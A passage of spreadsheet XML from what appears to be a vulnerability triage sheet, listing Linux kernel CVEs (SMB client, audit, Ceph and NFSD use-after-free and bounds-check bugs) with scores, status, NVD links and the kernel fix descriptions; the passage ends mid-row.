      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix UAF and buffer leak in cifs_check_trans2() for malformed secondary T2
When a valid primary TRANSACT2 response has been received (mid-&gt;resp_buf
set, mid-&gt;multiRsp true) and a subsequent secondary response causes
cifs_check_trans2() to return false -- either because the SMB header is
invalid (malformed != 0) or because check2ndT2() rejects the PDU --
handle_mid() overwrites mid-&gt;resp_buf with the new buffer (leaking the
primary buffer) and, because mid-&gt;multiRsp is set, skips the
server-&gt;smallbuf/bigbuf NULL-out.  When the user thread frees
mid-&gt;resp_buf, server-&gt;smallbuf or server-&gt;bigbuf is left dangling; the
demux thread reuses it for the next packet, resulting in a use-after-free.
Combine both early-exit conditions and, when mid-&gt;multiRsp is already
set, abort the pending transaction inline: set multiEnd, call
dequeue_mid() with malformed=true, and return true so handle_mid() exits
without touching mid-&gt;resp_buf or the server buffer pointers.</t>
        </is>
      </c>
      <c r="S79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89637</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89643</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr"/>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
audit: avoid dropping live tree ref on fsnotify rule autoremove
audit_del_rule() is used for both netlink deletion templates and internal
fsnotify autoremove.  The former passes a parsed template which owns a
temporary tree reference; the latter passes the installed entry itself.
The unconditional audit_put_tree() at the end of audit_del_rule() assumes
the template case.  For mixed AUDIT_DIR plus AUDIT_EXE rules, an fsnotify
autoremove event therefore drops the installed rule's live tree reference.
Repeating this across rules sharing the same tree can free the tree while
another rule still references it, and a later autoremove dereferences the
freed pathname while comparing rules.
Move the temporary-tree put to audit_rule_change(), the caller that owns
deletion templates.  Keep it in the AUDIT_DEL_RULE cleanup so both
successful deletion and -ENOENT still release the parser-owned tree.
[PM: dropped unnecessary comment for line length reasons]</t>
        </is>
      </c>
      <c r="S80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89643</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89651</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr"/>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound MDSCapAuth path and fs_name decode in handle_session()
handle_session() decodes the MDSCapAuth records carried by a
CEPH_SESSION_OPEN message (msg_version &gt;= 6). For each record the
match.path and match.fs_name byte strings are read by first decoding a
32-bit length and then copying that many bytes with the bare
ceph_decode_copy(). Unlike the surrounding fields, which all use the
_safe decode variants, these two copies are not preceded by a
ceph_decode_need() bounds check, and the enclosing MDSCapAuth and
MDSCapMatch struct_len fields are skipped rather than enforced as an
upper bound. A length larger than the bytes remaining in the message
front makes ceph_decode_copy() read past the end of the front buffer.
The message front is a dedicated allocation (ceph_msg_new2() -&gt;
kvmalloc), so the over-read runs off that object. A malicious or
compromised MDS can trigger this with the first post-connect message on
mount, with no client-side user interaction; under KASAN it is reported
as a slab-out-of-bounds read in handle_session().
Impact: a malicious MDS can force the kernel client to read up to 4 GiB
past the message front allocation during session setup, crashing the
client (out-of-bounds read).
Switch both copies to ceph_decode_copy_safe(), which performs the
ceph_decode_need() bounds check before the copy and branches to the
existing bad label, matching the rest of the decoder and the error path
that frees the partially decoded cap_auths array.</t>
        </is>
      </c>
      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89651</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89652</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: bound copied dentry name length in NFS export get_name
ceph_get_name() copies the MDS-supplied name into the caller's
NAME_MAX-sized buffer with memcpy(name, rinfo-&gt;dname, rinfo-&gt;dname_len)
and then writes name[rinfo-&gt;dname_len] = 0, without checking dname_len
against NAME_MAX. A malicious or buggy MDS that returns a LOOKUPNAME reply
with dname_len &gt; NAME_MAX overflows the buffer. __get_snap_name() copies
rde-&gt;name / rde-&gt;name_len the same unchecked way.
Impact: a malicious or compromised Ceph MDS overflows the NAME_MAX name
buffer in a client's NFS-export get_name path, a slab out-of-bounds write
reported by KASAN. Reachable when a CephFS mount is re-exported over NFS.
Add ceph_export_copy_name(), which rejects lengths above NAME_MAX with
-ENAMETOOLONG before the copy, and use it in both ceph_get_name() and
__get_snap_name().</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89652</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89653</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: reject export_targets ranks &gt;= CEPH_MAX_MDS in mdsmap decode
MDSMap export_targets entries are monitor controlled. check_new_map()
uses each entry as a bit number in a fixed stack bitmap, so a rank
outside the protocol namespace can make set_bit() write past the end of
the array.
Reject ranks outside CEPH_MAX_MDS while decoding the map. Do not
validate against possible_max_rank here because maps may legitimately
reference ranks beyond a temporarily reduced max_mds.</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89653</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89654</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix UAF in check_new_map() on session freed during unlock
check_new_map() iterates mdsc-&gt;sessions[] and for each active session
drops mdsc-&gt;mutex to perform per-session operations.  The forced-close
path (rank removed from map) correctly takes a reference on s via
ceph_get_mds_session() before releasing mdsc-&gt;mutex, but three other
paths do not:
  Path A (address changed):  mutex_unlock → mutex_lock(&amp;s-&gt;s_mutex)
  Path B (reconnect):        mutex_unlock → send_mds_reconnect(mdsc, s)
  Path C (active transition): mutex_unlock → mutex_lock(&amp;s-&gt;s_mutex)
Without the extra reference, another thread can acquire mdsc-&gt;mutex
during the unlock window, call __unregister_session() which drops the
last reference on s, and free it.  The original thread then accesses
freed memory via s-&gt;s_mutex.
Fix by adding ceph_get_mds_session(s) before each mutex_unlock and
ceph_put_mds_session(s) after the corresponding mutex_lock, matching
the pattern already used in the forced-close path.
Race timeline (Path A):
  Thread A (check_new_map)             Thread B (another map update
    holds mdsc-&gt;mutex                      or session teardown)
  --------------------------           --------------------------
  s = mdsc-&gt;sessions[i]
  (refcount == 1, held only by
   sessions[] array)
  mutex_unlock(&amp;mdsc-&gt;mutex)
                               ---&gt;    acquires mdsc-&gt;mutex
                                       __unregister_session(mdsc, s)
                                         sessions[i] = NULL
                                         ceph_put_mds_session(s)
                                           refcount: 1 -&gt; 0
                                           kfree(s)  &lt;--- freed!
  mutex_lock(&amp;s-&gt;s_mutex)
  UAF on freed s-&gt;s_mutex</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89654</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89655</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix UAF in __kick_flushing_caps() on cf entry freed during unlock
list_for_each_entry() iterates ci-&gt;i_cap_flush_list but drops
i_ceph_lock to send cap messages.  During the unlock window,
handle_cap_flush_ack() can acquire i_ceph_lock, detach cf entries
with tid &lt;= flush_tid from the list, release i_ceph_lock, and free
them via ceph_free_cap_flush() outside any lock.  When the original
thread reacquires i_ceph_lock and the for-loop macro advances via
cf = list_next_entry(cf, i_list), it dereferences cf-&gt;i_list.next
on freed memory.
The race timeline:
  __kick_flushing_caps()              handle_cap_flush_ack()
  -----------------------             -----------------------
  holds i_ceph_lock        &lt;---
  iterates to cf (tid=10)
  prepares FLUSH message
  drops i_ceph_lock        &lt;---
  __send_cap() ── FLUSH(tid=10)
	                              MDS sends FLUSH_ACK(tid=10)
                           ---&gt;       acquires i_ceph_lock
                                      cf-&gt;tid(10) &lt;= flush_tid(10),
                                      detaches cf from i_cap_flush_list
                                      drops i_ceph_lock
                                      ceph_free_cap_flush(cf) &lt;- frees it!
  acquires i_ceph_lock     &lt;---
  for-loop advances:
    cf = list_next_entry(cf, i_list)
      -- UAF on freed cf-&gt;i_list.next
The cf was just sent by __kick_flushing_caps itself via __send_cap().
The MDS may respond with FLUSH_ACK quickly enough that
handle_cap_flush_ack() frees cf before __kick_flushing_caps can
finish the iteration.
Fix by converting to a manual while loop: save the next pointer
under i_ceph_lock before dropping it, then use the saved pointer
after reacquiring, so the potentially-freed cf is never accessed again.</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89655</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89656</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
libceph: reject buckets with mismatched CRUSH ids
crush_decode() stores bucket data by array slot, and the mapper later
derives the per-bucket workspace index from the decoded bucket id. A
malformed map can therefore make one bucket reuse another bucket's
workspace by encoding an id different from -1 - slot.
For uniform buckets, the second replica selection expands the source
bucket's permutation into that aliased workspace buffer. If the source
bucket is larger than the aliased bucket, the write runs past the smaller
permutation array and can escape the kvmalloc'd CRUSH workspace. KASAN
reports a slab OOB write of 4 bytes in bucket_perm_choose().
Reject buckets whose encoded id does not match their array slot. Valid
CRUSH maps already use the canonical negative id corresponding to the
bucket slot, so this restores the invariant expected by
work-&gt;work[-1 - in-&gt;id] without changing valid map behavior.</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89656</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89658</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during NFSv4.0 revoked-state cleanup
nfs40_clean_admin_revoked() takes a stateid reference under
clp-&gt;cl_lock, drops nn-&gt;client_lock, and calls
nfsd4_drop_revoked_stid(), which dereferences the stateid's client
through s-&gt;sc_client-&gt;cl_lock.  The stateid reference does not pin the
client, so a teardown racing the dropped lock can free the client
while nfsd4_drop_revoked_stid() is still using it.
This cleanup runs from the laundromat, so a periodic sweep can race
force_expire_client() driven by a write to the clients/&lt;id&gt;/ctl file.
Skip a client that is already expiring and otherwise pin it with
cl_rpc_users under client_lock before dropping the lock, matching
nfsd4_revoke_states().</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89658</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89659</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during delegation revoke
A delegation stateid holds only a bare pointer to its owning
nfs4_client and does not keep it alive.  The client survives its
stateids only because __destroy_client() drains cl_delegations and
cl_revoked before free_client() runs.
nfs4_laundromat() breaks that invariant: it unhashes an
expired delegation from cl_delegations, drops deleg_lock, then
revoke_delegation() relinks it onto cl_revoked under cl_lock.  In that
window the delegation is on neither list, so client_has_state() can
report no remaining state.
Every teardown path first requires cl_rpc_users to be zero, but
the laundromat holds no such reference.  A client whose recalled
delegation has just timed out can therefore reach free_client()
while revoke_delegation() is still about to dereference cl_lock,
a use-after-free.
Pin the client with cl_rpc_users across the revoke so teardown blocks
until it completes, then reap the delegation from cl_revoked.  A client
already expiring reaps its own, so skip it and leave the delegation on
del_recall_lru.</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89659</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89660</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during admin state revocation
A stateid holds only a bare pointer to its nfs4_client; a stateid
reference does not pin it.  The client survives only because
__destroy_client() drains its stateids before free_client() runs.
nfsd4_revoke_states() drops nn-&gt;client_lock across revoke_one_stid(),
which dereferences the client to revoke a stateid and read
clp-&gt;cl_minorversion.  A teardown racing the dropped lock can free
the client first.
Pinning cl_rpc_users under client_lock blocks the DESTROY_CLIENTID and
EXCHANGE_ID teardown, which refuses while cl_rpc_users is non-zero.
force_expire_client() ignores it: once its wait for cl_rpc_users to
reach zero has passed, a later pin goes unnoticed.
Under client_lock, skip a client whose cl_time is already zero --
force_expire_client() clears it there before waiting -- otherwise pin
cl_rpc_users before dropping the lock.  The walk then either sees the
expiry and skips, or pins in time for that wait to cover the revoke.</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89660</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89662</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent lock owner use-after-free during client teardown
__destroy_client() releases a client's open owners, but a lock owner
whose only reference is a blocked lock (nbl) stays on
cl_ownerstr_hashtbl.  client_has_state() does not count a bare owner,
so DESTROY_CLIENTID can reach __destroy_client() with such owners
present.
__destroy_client() then walks the table, calling remove_blocked_locks()
on each owner without a reference.  Freeing a blocked lock drops the
owner reference held via flc_owner.  The per-net laundromat reaps
blocked locks from nn-&gt;blocked_locks_lru independently of client state.
The two paths share blocked_locks_lock only for the list splice, not
the owner's lifetime.  The laundromat therefore frees the owner as
__destroy_client() dereferences it, a NULL dereference in
remove_blocked_locks().
nfsd4_release_lockowner() holds a reference across the same call;
__destroy_client() does not.  Hold cl_lock across the walk, taking a
reference and unhashing each owner, then drop it before
remove_blocked_locks() and nfs4_put_stateowner(), which take
blocked_locks_lock and cl_lock.</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89662</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89669</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: initialize copy-notify stateid before publishing it
nfsd4_copy_notify() finished initializing the cpntf state after
nfs4_alloc_init_cpntf_state() had already linked it into the
s2s_cp_stateids IDR and the parent's sc_cp_list, with cs_count == 1 (the
membership reference) and none held for the caller. A racing
OFFLOAD_CANCEL (crafted cl_id == nn-&gt;s2s_cp_cl_id plus the guessable
so_id) could reach manage_cpntf_state() and free the entry, turning the
caller's subsequent cpn_cnr_stateid read and cp_p_stateid/cp_p_clid
writes into use-after-free. The owning clientid was also only recorded
after publication, so it could not gate an ownership check in that window.
Record cp_p_stateid and cp_p_clid inside nfs4_alloc_init_cpntf_state()
before nfs4_init_cp_state() publishes the entry, and return it with an
extra reference. The caller reads the stateid under that reference and
drops it with nfs4_put_cpntf_state(); on a late error the laundromat
